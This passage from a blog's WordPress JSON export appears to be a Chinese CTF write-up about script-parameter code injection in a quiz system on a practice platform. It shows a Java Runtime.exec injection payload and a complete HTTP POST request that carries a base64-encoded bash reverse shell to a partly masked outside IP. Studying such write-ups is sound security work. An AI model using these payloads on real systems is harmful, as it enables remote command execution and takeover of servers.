\u6240\u4ee5script\u95ed\u5408\u524d\u540e\u4e2d\u62ec\u53f7\u5373\u53ef\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5982\u679c\u53d6script\u7684\u503c\u4e3a}Java.type('java.lang.Runtime').getRuntime().exec('calc');{<\/code>\uff0c\u6700\u540e\u6267\u884c\u7684\u4ee3\u7801\u5c31\u4e3a<\/p>\n\n\n\n
function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}<\/code><\/pre>\n\n\n\n
\u5c31\u4f1a\u5728\u6267\u884c\u7a7a\u51fd\u6570\u4e4b\u540e\u6267\u884c\u6211\u4eec\u7684java\u4ee3\u7801<\/p>\n\n\n\n
POST \/function\/save HTTP\/1.1\r\nHost: eci-2ze8xvlehb916vgm55w3.cloudeci1.ichunqiu.com:8088\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\r\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nAccept-Encoding: gzip, deflate\r\nConnection: close\r\nCookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1708874004,1709259580,1709638171,1709691446; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1709691446\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 228\r\n\r\nid=&name=rce&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec(%22bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjEuMzYueHh4Lnh4LzkzODMgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22)%3B%7B<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
\u6bcf\u5929\u4e0a\u53bb\u7b7e\u5230\u7136\u540e\u987a\u4fbf\u505a\u4e00\u9053 CVE-2022-32991 Web Based Quiz System SQL\u6ce8 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2168","post","type-post","status-publish","format-standard","hentry","category-6"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2168","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=2168"}],"version-history":[{"count":33,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2168\/revisions"}],"predecessor-version":[{"id":3236,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/2168\/revisions\/3236"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=2168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=2168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=2168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}